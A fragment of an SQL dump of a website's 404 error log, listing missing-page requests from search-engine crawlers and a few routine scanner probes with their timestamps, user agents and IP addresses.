Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37823,'2023-01-29 16:27:03','/weird/9bm4y8ye2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37824,'2023-01-29 16:30:18','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4183.83 Safari/537.36','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37825,'2023-01-29 16:42:55','/handcolor/dps8ck4e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37826,'2023-01-29 16:45:26','/advice/med-bWVkaW/193comfo','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37827,'2023-01-29 16:50:47','/ays244rf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37828,'2023-01-29 16:53:28','/tr11wk3g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37829,'2023-01-29 17:07:30','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.65.123'),(37830,'2023-01-29 17:12:47','/pastil14/93mrz38e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37831,'2023-01-29 17:13:40','/keynote/aco-YWNvcm/103crook','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37832,'2023-01-29 17:18:30','/comments/dGlua2vy-72','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37833,'2023-01-29 17:19:13','/t7a9a4qf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37834,'2023-01-29 17:19:19','/ie2au16f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37835,'2023-01-29 17:20:01','/tympanitic/wx7dsbif2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37836,'2023-01-29 17:22:26','/brace/wxlsiajd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37837,'2023-01-29 17:25:02','/layers/1xibts1h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37838,'2023-01-29 17:57:02','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/102.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37839,'2023-01-29 18:04:29','/lithodomous25/wd3au3pe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37840,'2023-01-29 18:17:41','/palliobranchiata/i4hj97qf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37841,'2023-01-29 18:19:10','/i2w2unlg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37842,'2023-01-29 18:26:07','/notes/warm15','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37843,'2023-01-29 18:26:47','/document/dolima0','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37844,'2023-01-29 18:49:56','/kq1gi4ng2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37845,'2023-01-29 18:50:08','/93ca6b5e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37846,'2023-01-29 19:16:57','/tarnisher1/a0ildnae2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37847,'2023-01-29 19:27:45','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:74.0) Gecko/20100101 Firefox/74.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37848,'2023-01-29 19:27:51','/body/iyn9a97e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37849,'2023-01-29 19:29:00','/imfb46cf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37850,'2023-01-29 19:30:20','/body/tsgq4iue2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37851,'2023-01-29 19:39:20','/articles/foam-boosters/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(37852,'2023-01-29 19:45:02','/prudential/wlz3dl0g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37853,'2023-01-29 19:49:12','/dx7vbpjg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37854,'2023-01-29 19:51:59','/repertoire28/kala1bje2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37855,'2023-01-29 19:53:44','/immew8/i2kd3d1e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37856,'2023-01-29 20:13:22','/wj8gofpe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37857,'2023-01-29 20:24:06','/devrm33e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37858,'2023-01-29 20:26:54','/onirocritic11/agn86a4e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37859,'2023-01-29 20:29:07','/ineffectible/ke1ynape2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37860,'2023-01-29 20:43:39','/pellucidly/dx09cc3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37861,'2023-01-29 20:46:08','/body/tnat2jmf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37862,'2023-01-29 20:56:05','/advice/stian0','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37863,'2023-01-29 21:13:10','/body33/1lpydgdf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37864,'2023-01-29 21:13:29','/salvor/isim7q5e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37865,'2023-01-29 21:23:29','/carpenter/93inspuf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37866,'2023-01-29 21:29:28','/exequious/i452vckf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37867,'2023-01-29 21:55:23','/cn/','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37868,'2023-01-29 22:15:57','/humans.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 OPR/84.0.4316.14','https://dailyjolly.co.uk/humans.txt',404,'GET',NULL,'130.255.166.24'),(37869,'2023-01-29 22:15:58','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 OPR/84.0.4316.14','https://dailyjolly.co.uk/ads.txt',404,'GET',NULL,'130.255.166.51'),(37870,'2023-01-29 22:16:02','/kebgarhe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37871,'2023-01-29 22:23:56','/aoomlcqe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37872,'2023-01-29 22:27:37','/wellmeaner/dhmydk2h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37873,'2023-01-29 22:50:19','/18ksvy8e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37874,'2023-01-29 22:50:23','/hastings/wbsdxnqg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37875,'2023-01-29 22:55:51','/articles/ringbo4','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37876,'2023-01-29 22:58:39','/body/iwoztz6g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37877,'2023-01-29 23:04:54','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/101.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37878,'2023-01-29 23:32:59','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3760. Safari/537.36 Edg/77.0.141.7','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37879,'2023-01-29 23:34:24','/stanleyi/tr9iflrf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37880,'2023-01-29 23:41:19','/pecal3/1qqnnkwf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37881,'2023-01-29 23:41:24','/whwdkr4f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37882,'2023-01-30 00:20:55','/investing/9rujx39f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37883,'2023-01-30 00:22:11','/sitting/imbasbgf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37884,'2023-01-30 00:38:09','/sinistrorse4/aknacm3g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37885,'2023-01-30 00:39:36','/misliked14/t3945h8e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37886,'2023-01-30 00:39:58','/awieaque2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37887,'2023-01-30 00:40:27','/iweehzjf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37888,'2023-01-30 00:42:56','/923zglhe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37889,'2023-01-30 00:44:28','/wlty5nje2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37890,'2023-01-30 01:07:01','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/101.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37891,'2023-01-30 01:14:31','/15gn0gme2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37892,'2023-01-30 01:43:26','/1hrn283g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37893,'2023-01-30 01:47:32','/wnutiu2e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37894,'2023-01-30 01:51:16','/thujin/koepxekd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37895,'2023-01-30 01:51:16','/rehabilitated/9fjs1fkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37896,'2023-01-30 02:13:29','/ieb94tde2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37897,'2023-01-30 02:16:38','/page/5','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64; trendictionbot0.5.0; trendiction search; http://www.trendiction.de/bot; please let us know of any problems; web at trendiction.com) Gecko/20170101 Firefox/67.0',NULL,404,'GET',NULL,'144.76.22.15'),(37898,'2023-01-30 02:17:58','/imu80ogf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37899,'2023-01-30 02:18:40','/siccative/agsxwcjd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37900,'2023-01-30 02:31:15','/tve2t13f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37901,'2023-01-30 02:33:52','/adminer/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'96.45.160.98'),(37902,'2023-01-30 02:46:42','/interrogating1/ts7cfree2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37903,'2023-01-30 02:50:39','/t2lmtqne2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37904,'2023-01-30 02:56:46','/polariscopy/am83c22f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37905,'2023-01-30 03:14:28','/inceptively/ismw1g2g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37906,'2023-01-30 03:24:05','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37907,'2023-01-30 03:29:16','/ieire8je2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37908,'2023-01-30 03:50:14','/comers/do5xcc0f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37909,'2023-01-30 03:50:16','/heresiarchy/1xm49hhe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37910,'2023-01-30 03:51:37','/manipulative/9r0sgv0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37911,'2023-01-30 03:53:47','/cliffbrake/10733h1g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37912,'2023-01-30 03:54:29','/w58oau2e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37913,'2023-01-30 04:09:58','/9ir0et1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.78'),(37914,'2023-01-30 04:17:33','/9382fq0f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.61'),(37915,'2023-01-30 04:20:51','/tjn67afe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37916,'2023-01-30 04:41:06','/wp-content/plugins/learnpress/assets/js/dist/utils.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,404,'GET',NULL,'89.39.107.6'),(37917,'2023-01-30 04:41:11','/wp-content/plugins/learnpress/assets/js/dist/utils.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,404,'GET',NULL,'162.244.33.54'),(37918,'2023-01-30 04:57:04','/93q630ye2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 